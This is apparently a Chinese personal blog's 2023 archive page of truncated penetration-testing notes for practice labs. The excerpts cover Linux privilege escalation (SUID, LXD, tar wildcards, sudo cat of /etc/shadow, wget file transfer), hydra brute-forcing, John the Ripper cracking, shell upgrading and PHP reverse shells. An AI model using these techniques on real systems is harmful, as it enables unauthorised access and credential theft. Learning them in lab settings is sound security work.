01 2023 档案
摘要:一些关于文件修改的笔记 ls -al 可以列出该路径下所有文件的权限 其中: 1.对于文件: r(read):代表可读文件内容 w(write):代表可写入该文件 x(execute):代表可执行该文件 2.对于文件夹: r(read):代表可读取文件夹内容,但不一定可进入 w(write):代表可
阅读全文
摘要:有些文件可执行,且其中包含一个命令去调用另一个程序,而被调用的程序并没用路径引用,那么可以通过改系统路径的方式来提权 例如有个file文件 strings file 得 tar xxxxx xxxxx /bin/vim xxx xxx 那么其中,可以通过tar来提权 方法一: 1.先移动到另一个路径
阅读全文
摘要:find / -type f -name root.txt 2>/dev/nullf是文件类型name后接文件名 find -perm -4000的含义 -perm是权限匹配 4000 2000 1000分别表示SUID SGID SBIT 1.普通文件,文件的权限一般三位,777最高文件权限 -p
阅读全文
摘要:以普通用户进入目标机后,id,发现存在lxd组别,可使用一下提权方法 漏洞介绍 LXD是一个root进程,它负责执行任意用户的LXD UNIX套接字写入访问操作。而且在某些情况下,LXD甚至都不会调用它的用户权限进行检查和匹配,本文就是讨论这种攻击方式。 Linux Container(LXC)通常
阅读全文
摘要:把各种reverse shell都试一遍,绝对可以 Reverse Shell Cheat Sheet | pentestmonkey
阅读全文
摘要:hydra破解web登录解密的格式 1.POST的形式 hydra -l user_name -P /usr/share/wordlist/rockyou.txt IP_address http-post-form "/login:user=^USER^&passwd=^PASS^:F=incorr
阅读全文
摘要:John Ripper——开膛手John,强力的hash暴力破解软件 0.先要破解hash就得先识别hash的类型 一般用hash-id.py的python脚本来自动识别hash 操作: wget https://gitlab.com/kalilinux/packages/hash-identifi
阅读全文
摘要:1.TryHackMe——渗透学习网站 TryHackMe | Dashboard 2.HackTheBox——渗透学习网站(梯子进网) Hack The Box: Hacking Training For The Best | Individuals & Companies 3.WeChall——
阅读全文
摘要:当执行sudo -l后只出了cat的情况下的提权方法 原理: Linux里有一个文件/etc/shadow 这个文件里包含了root的密码 操作 LFILE=/etc/shadow sudo cat "$LFILE"后面的/etc/shadow可以换为任意一个绝对路径下的文件,但必须是文件,文件夹不
阅读全文
摘要:以普通用户登入后,先sudo -l 看看有什么具有root权限、且普通用户可以写入的脚本 例:A.sh 该类脚本普通用户是启动不了的,但可以通过链式脚本启动 再看看有什么链式脚本可以启动A.sh 例: 存在脚本B.sh,其内部为: #!/usr/bin/perl system("sh", "/etc
阅读全文
摘要:Linpeas是一个非常好的信息搜集脚本,通常得想方设法上传到目标机上执行 在上传完成后,应及时的 chmod +x linpeas.sh 然后再 ./linpeas.sh 接着就可以收集相关的root信息了 在收集一些信息后,比如该用户能跑的脚本 就可以去/etc下搜索相关联的程序 cd /etc
阅读全文
摘要:在以普通用户进入目标机后应该及时升级shell 命令 python -c 'import pty; pty.spawn("/bin/bash")' 不然有些命令无法使用 像su命令,会返回“must be run from terminal” 这是因为当你进入目标机时,你的session可能并没有被
阅读全文
摘要:以普通用户进入目标机后,若是可以运行tar指令,则可以通过以下的方法进行提权 原理: tar有通配符*的漏洞,tar用通配符来压缩文件并读取文件名,若是看到有参数则将执行。 操作: 1.先cd到一个用户有完全执行命令的文件夹下 例如:www-data用户的完全权限文件夹为/var/www/html
阅读全文
摘要:试过很多的方法,但发现就这个适用于我 1.先找到想上传的文件夹,进入该文件夹,右键gitbash-here 2.在gitbash界面输入 git clone https://XXXX.git即你要上传的仓库链接,一定得是公开的 3.接着你会在本地文件夹里看到新建了一个文件夹,把所有你想上传的文件或文
阅读全文
摘要:在进入目标机的服务器管理员界面后,有时候发现可以通过上传或修改php文件来进入目标机 方法有很多: 1.netcat: 这是基于netcat的方法 首先得有一个php reverse shell.php文件 可以用 git clone https://github.com/pentestmonkey
阅读全文
摘要:有时候用普通用户登录目标机后用 sudo -l 发现该用户什么命令都不能sudo 解决方法如下 先用 find / -perm -4000 2>/dev/null | grep '/bin/'或者find / -user root -perm -u=s 2>/dev/null find的使用 看看能
阅读全文
摘要:一般在了解了服务器的版本后,先用 searchexploit XXXXXXXX为版本名,例如tomcat 搜索后会出一串的.txt,根据版本号和描述选择自己想要的.txt,记下.txt前面的数字。 然后 searchexploit -m XXXX.txt XXXX就是那串数字 这时会出现简短的漏洞描
阅读全文
摘要:这是一些个人认为挺有用的网站,其网站背后的故事我不知道,也不想说 只列网址,只说用法 1.hashcat:example_hashes [hashcat wiki], 一般kali上都自带hashcat,没有的话就 sudo apt install hashcat -y 用法:先看看密文的特征,然后
阅读全文
摘要:个人解密PGP文件的方法 原理:pgp文件的后缀为.pgp,一般该文件还会伴随一个.asc的文件。这两个文件其中pgp是被加密的文件,而asc文件需要被导入,用于读取密钥。 PGP解密步骤 1.先把asc文件本身的hash解密(如果没有则忽略),用john跑字典解密 gpg2john example
阅读全文
摘要:特别地,有时在目标机上使用GTFOBins搜到的方法失效,这里记录一下wget的特殊提权方法 原理: wget有两个选项: --post-flie可以传送文件 --output-document可以将下载的文件另存为(即可以覆盖原文件) 方法: 1.先将目标机上etc文件夹下的sudoers上传到本
阅读全文